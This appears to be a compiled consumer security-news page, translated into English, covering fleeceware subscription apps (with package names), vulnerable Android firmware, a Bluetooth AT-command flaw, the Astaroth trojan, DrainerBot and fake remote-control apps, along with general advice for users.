Delete these 23 dangerous fleeceware apps from your smartphone now

They returned, but no one missed them. What are we talking about? Of the fleeceware apps, a particular type of applications capable of stealing from users even more than 200 euros with a single click . Sophos researchers have discovered 23 apps that deceive users and activate very expensive monthly subscriptions without their knowledge.

Sophos researchers have unearthed 23 very dangerous apps that steal users' money. Here's what they are

This is certainly not new, we had talked about their danger on other occasions, but it seemed that Google had managed to limit their power by changing the terms of use within the Play Store. But as the saying goes: “made the law, found the deception”. According to reports from Sophos computer researchers, the developers have discovered a flaw in the rules of the new Google store policy and have managed to publish 23 apparently free applications , but which after a certain amount of time activate subscriptions that reach up to a price of $ 249. Withdrawn directly from the user’s account. And everything is legitimate: it is the user himself who authorizes the payment when he installs the app, even if he is not aware of it.

What are “fleeceware” apps

They do not install any kind of virus, no malware, no spyware that can spy on the user: in the eyes of any antivirus, fleeceware apps are absolutely legitimate. But they are not dangerous for this. And to make us understand it is precisely the term fleeceware, created specifically by Sophos researchers to categorize this type of app.

In English the verb “to fleece” means “to undress”, “to shear” or even “to peel”. And that’s exactly what fleeceware apps do : they “skin” users by stealing their money to activate monthly subscriptions at a very high cost. And they do it without the knowledge of the person, who is directly charged to the current account.

How can such a thing happen? Because the developers are very good at hiding the fact that after a trial period the subscription starts automatically. The user installs the app and thinks it’s free forever, but it’s not. During the installation phase, the app warns the user of the automatic activation of the subscription once the trial period is over, but unfortunately very few people read the Terms of Use.

Fleeceware apps have evolved

To put an end to this scam, Google has changed the Terms of Use in recent months to make it clearer to the user when an app is subscribed after the trial period. As often happens in these cases, however, developers have already found a way to revive fleeceware apps, using two new tactics called Blind Sub and Spam Sub .

In the first case, when a person opens one of these apps, he finds in the home a button that says “Try for free”. After pressing the button, the billing terms appear, but they do not make it clear that after the free trial period a paid subscription starts.

The second method, however, is even more subtle. Just download an app, subscribe to the service that seems to be free, to see activated a mass subscription to a series of connected services that the user does not even know exist. This way the scammers are able to maximize the profit, even if only for a month.

What are the 23 apps to delete immediately from the Android smartphone

Sophos has also published a list of 23 fleeceware app available on the Google Play store and that have not been eliminated. In addition to the name of the applications, they have also published the price of the monthly or weekly subscription and the revenue made from the apps with this ploy. Here’s the full list:

com.photoconverter.fileconverter.jpegconverter – $ 249.99 / € 224.99 / year – $ 8k
com.recoverydeleted.recoveryphoto.photobackup – $ 249.99 / € 224.99 / year- $ 60k
com.screenrecorder.gamerecorder.screenrecording – $ 249.99 / € 224.99 / year- $ 10k
com.photogridmixer.instagrid – $ 229.99 / € 219.99 / year – $ 5k
com.compressvideo.videoextractor – $ 229.99 / € 219.99 / year – $ 10k
com.smartsearch.imagessearch – $ 229.99 / € 219.99 / year – $ 30k
com.emmcs.wallpapper – $ 89.99 / week – $ 20k
com.wallpaper.work.application – $ 89.99 / week – $ 30k
com.gametris.wallpaper.application – $ 89.99 / week – $ 30k
com.tell.shortvideo – $ 89.99 / week – $ 10k
com.csxykk.fontmoji – $ 89.99 / week – $ 40k
com.video.magician – $ 89.99 / week – $ 30k
com.el2020xstar.xstar – $ 89.99 / week – $ 10k
com.dev.palmistryastrology – $ 69.99 / week – $ 5k
com.dev.furturescope – $ 69.99 / week – $ 90k
com.fortunemirror – $ 69.99 / week – $ 20k
com.itools.prankcallfreelite – $ 44.99 / year – $ 5k
com.isocial.fakechat – $ 45.99 / year – $ 5k
com.old.me – $ 94.99 / year – $ 5k
com.myreplica.celebritylikeme.pr – $ 12.99 / € 10.99 / week – $ 5k
com.nineteen.pokeradar – Pay per install
com.pokemongo.ivgocalculator – Buggy app
com.hy.gscanner – $ 79.99 / year – $ 5k

How to protect yourself from the fleeceware app

There is no tool or application that can protect you from this type of scam . The only thing is to report to the Google Play Store and the App Store the presence of this type of app when you encounter one so that it is immediately deleted.

Discovered 148 vulnerabilities affecting Android smartphones: the list

A report funded by the US Department of Security highlights Android security vulnerabilities on hundreds of millions of devices
A report funded by the US Department of Security highlights Android security vulnerabilities on hundreds of millions of devices

When you buy an Android smartphone, you rarely have installed a pure version of the Google operating system . Unless you buy a Pixel or a device from the Android One program , you will have to deal with mobile phones full of software and apps made by third-party developers who, on more than a few occasions, can be full of vulnerabilities.

In cases like these, all the safety precautions you can take and all the tools present within the operating system have virtually no value . The hackers will have an easy to exploit one of these vulnerabilities, even before you smartphone purchases. Thus, from the first power on, an attacker could be able to exploit these vulnerabilities and access information in the device’s memory.

A more frequent scenario than you can imagine. Kryptowire, a company active in the field of information security, has just released a report on vulnerabilities inherent in the Android firmware funded by the US National Security Department. From this report it appears that the devices of as many as 29 manufacturers – most of them Chinese, but there are also several big names – are affected by 150 vulnerabilities, some of which are quite dangerous.

Android vulnerabilities more dangerous than the infected apps: what can happens?

As pointed out in the Kryptowire report, the vulnerabilities discovered in the apps pre-installed on smartphones are much more dangerous than the infected applications in the Play Store . The reason is easy to say: these last apps, in the vast majority of cases, can be removed and, with them, also the vulnerability or the malware they carry with them. The so-called bloatware, on the other hand, are installed at the operating system level and can hardly be deleted by the user. Even if the factory settings were to be reset , the system app vulnerability will still be reinstalled in the device. In short, a problem apparently without solution.

Which smartphones are in danger

According to the Kryptowire report, as many as 29 smartphone manufacturers are delivering devices with vulnerabilities of all kinds into their customers’ hands. Most of the devices made and sold by these producers contain these bugs and, as seen a little above, there is very little that users can do.

In the list we find little-known producers like Advan, Allview, Evercross, Tecno and Walton, but also brands of the level of Xiaomi, Asus, Samsung and Sony . Adding the devices sold during the year only by these four producers easily exceed 130 million devices in 2019 alone . Potentially, there are hundreds of millions, if not billions, of smartphones at risk . A danger far beyond what any infected app on the Play Store can potentially reach.

Bluetooth devices endanger smartphones: the list

US researchers have discovered a vulnerability of Android smartphones that can steal users' personal data
US researchers have discovered a vulnerability of Android smartphones that can steal users’ personal data

A new vulnerability affects Android smartphones and endangers hundreds of thousands of devices. The alarm was raised by researchers from Purdue University and Iowa University who published a research paper showing that some Bluetooth devices or USB accessories are able to steal relevant smartphone information such as the IMEI number , the code used to identify a mobile phone.

The technique discovered by the researchers allows a potential hacker an endless series of actions. All very dangerous and endangering users’ personal data . But not only. The devices can be used in turn to launch DDoS attacks (acronym of Distributed Denial of Service) able to KO a website or a company network. The search was carried out on a dozen Android smartphones with different processors: Qualcomm, HiSilicon (Kirin) and Samsung (Exynos) and all were vulnerable to attack, even if in a different way.

The researchers immediately alerted the producers and waited ninety days before publishing the report, to allow time to develop a patch. The only company that gave the researchers an answer was Samsung, which started developing a fix that will be published with the next updates.

How the vulnerability that affects Android smartphones works

Let’s start with the conclusion: the vulnerability discovered by the researchers is rather complicated to implement and requires a big investment in terms of time and hours by the hackers. But some attackers could still exploit it to steal your personal information.

As explained in the research paper, the vulnerability affects several Android smartphones , which exploit an operating system flaw to “enter” the device. To do this it is necessary to use Bluetooth devices or USB accessories designed specifically for this type of operation. Researchers have shown that using these devices it is possible to execute AT commands . These are commands that set features such as connection type, waiting times, and busy signal detection. Also, you can also get the IMEI number of the smartphone, take control of the mobile phone for perform DDoS attacks or remotely stop smartphone connectivity. A series of important activities in a person’s everyday life.

The list of Android smartphones affected by the vulnerability

The researchers tested ten devices from six different manufacturers . Here is the complete list:

Galaxy S8 +
Google Pixel 2
Huawei Nexus 6P
Motorola Nexus 6
Galaxy Note 2
Galaxy S3
LG G3
LG Nexus 5
HTC Desire 10 Lifestyle
Huawei P8 Lite

These are fairly dated smartphones, but this does not mean that newer devices are not equally vulnerable to attack. As mentioned above, researchers have warned manufacturers that they are working to release a security patch as soon as possible. Samsung was the first to get to work to find a solution to the problem.

How do hackers spy on us: How To avoid the risk of hackers stealing data

he vast majority of targeted attacks start from a phishing mail
Just a photo or phone number to discover your identity on the Internet. Do not you believe it? Then you do not know the experiments conducted by Kaspersky.

In recent years hacker attacks have increased exponentially. Some of these episodes have resulted in the theft of personal data of millions of social network users and other sites that required registration. In other cases, however, it was targeted attacks, to take possession of personal data of specific people or to enter their computers and their mobile devices.

According to the well-known computer security company Kaspersky, the vast majority of targeted attacks start from a phishing mail . This means that hackers have managed to get hold of some user data and used them for a more complex and profitable attack on them. But how do hackers steal the data ? Kaspersky himself did an experiment: he tried to replicate all the possible ways in which a hacker can obtain information about us starting from an anonymous photo, a name and surname or an email address and telephone number.

How to find out a person’s name from a photo

When a hacker has only one photo available, his search starts uphill. There are sites like FindFace that can recover a person’s social identity if we provide him with several shots to process. Once it was a free tool and open to the public, now the company prefers to sell its technology only to governments and large companies. A hacker could also use Google, but with very few results because the search for images does not shine for accuracy and can only find the photos posted on websites and not those posted on social networks.

How to find a person with name and surname

Having the name and surname available, however, the hacker’s mission begins to be simpler. Unless the user has a very common name and surname, like Mario Rossi. With these two data it is often possible to find at least one more or less public social profile of the user, from which extrapolate other useful information to continue the attack.

How to find a person with email

With email and phone number an attacker can use services like Pipl, which collects information from different social networks and creates almost complete profiles with everything on the web about that person. If the username of the personal email box is then the same as that of the company, an attacker could use programs like Namechk or Knowem that automatically track an account created with hundreds of different services including: Facebook, Blogger, Ebay, WordPress, Pinterest and many others. Therefore, starting from a company email address, you can easily reach a personal profile.

What to do to avoid identity theft

To avoid the risk of hackers stealing data, Kaspersky reiterates some basic advice:

Do not register on social networks with e-mail addresses or phone numbers that are then made public
Do not use the same photo on personal and work profiles
Use different names to prevent one profile from leading to another and so on
Do not make life easier for cybercriminals by posting unnecessary information about you on social networks

Astaroth: A trojan disguised as an image can infect PC and steals your data

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here’s how Astaroth works

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here's how Astaroth works

In these days, a new hacker campaign with the Astaroth trojan , already known to security experts because it has infected thousands of computers around the world in the last three months of 2018, is underway in Brazil and Europe . infection starts from a false image, spread by email.

The new strain of the trojan was discovered by Cybereason researchers and also uses BITSAdmin , an official utility of Microsoft Windows designed to facilitate the operations of downloading or uploading, but used by the trojan to download malicious code. This variant of Astaroth is distributed through spam email campaigns and the infection begins with the opening by the user of an archive in .7zip format attached to the email or inserted in a link or, in fact, in a Gif or Jpg image. The malicious archive contains a .lnk file that starts the actual infection. Subsequently, the malware connects to a server and begins to steal information on the infected computer. Then use BITSAdmin to fetch other images and files from another server.

Immune to antiviruses

The very dangerous thing about Astaroth, and the novelty compared to previous infections based on this trojan, is its ability to modify, injecting a malicious code, a .dll file used by the Avast antivirus. Through this file, after having infected it, the trojan manages to steal other information about the machine it is running on and to download other code. Moreover, it also manages to hide itself in case of an antivirus scan carried out with Avast.

What Astaroth does

The Cybereason research team has discovered that once the trojan has successfully infiltrated, it records user keystrokes, intercepts their calls to the operating system and continually gathers all the information saved to the clipboard . With these methods, it collects significant amounts of personal information, including those on the user’s bank accounts. And if the infected PC is connected to a LAN, Astaroth can also collect the network access passwords of all the other computers connected to the same LAN, the email account passwords, the Messenger account data, the password Internet Explorer.

Astaroth first appeared online in 2017, and then infected thousands of PCs, especially in South America. He had several evolutions before arriving at the current one. An earlier version, for example, was hidden in fake Amazon emails containing confirmations of orders never made by the user. But if the user clicked on the links contained in the email the infection started.

DrainerBot, the malware that consumes phone data traffic

A group of computer security researchers has discovered several counterfeit apps on the Play Store that consume data traffic by reproducing advertisements.

DrainerBot spreads thanks to apparently legitimate Android apps and high-sounding names

The imagination of hackers, by now, has accustomed us to practically everything. Over time we have seen malware designed to steal data ; those to turn PCs and smartphones into “zombies” and control them remotely ; not to mention those who exploit the resources of the infected device to create cryptocurrencies of all kinds , from Monero to Bitcoin .

Viruses created to consume the data traffic of the affected users’ phone plan , however, had not yet been heard of. And, most likely, nobody missed it. The fact is that the security researchers of Oracle have found malicious code hidden in the Android app whose main purpose seems to be exactly to consume the gigabytes of data traffic of our rate plan by running videos in the background, without the user noticing . Behind this anomalous behavior, however, hides a scam perpetrated by a group of hackers against advertising networks.

How DrainerBot works

The malware, as mentioned, spreads thanks to apparently legitimate Android apps and high-sounding names. At the moment, in fact, DrainerBot has been identified in the app as “Perfect365”, “VertexClub”, “Draw Clash of Clans”, “Touch ‘n’ Beat – Cinema” and “Solitaire: 4 Seasons (Full)”. As soon as the infected applications were downloaded and installed, DrainerBot went into operation, starting to play videos in the background and thus quickly consuming all the data plan data traffic.

But what is the real purpose of DrainerBot? As mentioned initially, in fact, data consumption is only the most “obvious” behavior of the malware. In reality, compromised apps play advertising videos, which allow hackers to gain by cheating advertising networks . The ads, in fact, were not really displayed by users, but were reproduced without anyone noticing. Not even the managers of the scammed advertising networks.

According to Oracle analysts, infected apps can consume up to 10 gigabytes of data every month and therefore represent a risk for the users affected. If your tariff plan has lower thresholds, in fact, you run the risk of seeing your residual credit fall rapidly or, even worse, of receiving particularly high bills.

Android Virus: Delete 9 fake Apps immediately from your Android Devices

Eset, a company specializing in cybersecurity, has discovered nine applications on the Play Store that showed deceptive ads on the smartphone
Eset, a company specializing in cybersecurity, has discovered nine applications on the Play Store that showed deceptive ads on the smartphone

They looked like harmless apps to turn the smartphone into a remote control , but they were not so harmless and they were removed from the Play Store. There are nine fake applications reported in recent days to Google by ESET , the company that develops the well-known Nod32 antivirus, because once installed they filled the user’s cell phone with such an invasive advertising that the device was almost unusable.

The applications are all ” remote controller ” apps, that is, apps used to use the smartphone to control the TV , the air conditioner or any other device that can be controlled with a wireless connection. Their names are: Remote control for TV and home electronics , Remote control , TV remote controller , Remote for Air conditioner , TV remote controlling , Remote for television for free , Air conditioner remote control , Universal TV remote controller , Remote control for the car . They are all from the Tols4TV developer and have been downloaded by at least 8 million users before being removed from the official Google store.

Remove these fake apps right now from your Android devices:

Remote control for TV and home electronics , Remote control , TV remote controller , Remote for Air conditioner , TV remote controlling , Remote for television for free , Air conditioner remote control , Universal TV remote controller , Remote control for the car .

Android application false: what are the dangers for the smartphone

These are completely false applications : none of them carried out the remote control functions promised before installation. Instead they did something else: some were running in the background, making it difficult for the user to deactivate them, others, while not loading in the background, once they were launched were impossible to use because any user input responded with a full-screen banner ad. These 9 fake apps. Moreover, they were not the only ones among those on the Play Store to behave this way: last week another antivirus company, Trend Micro, reported 85 that were completely similar. In this case the two developers of the apps were Alger Games and Kodev. Google responded to the reports by deleting all the apps from these developers from the Play Store.

Given the large amount of fake apps on the official Google store , there was no lack of criticism of Big G due to the lack of control over developers and individual apps. Both ESET and Trend Micro recommend that you pay close attention to the applications you download and install on your smartphone. The two computer security companies suggest to read very well the reviews released by users to the app , to check the permissions required by the app before installing it, to keep updated the Android operating system and to install a good antivirus for mobile devices.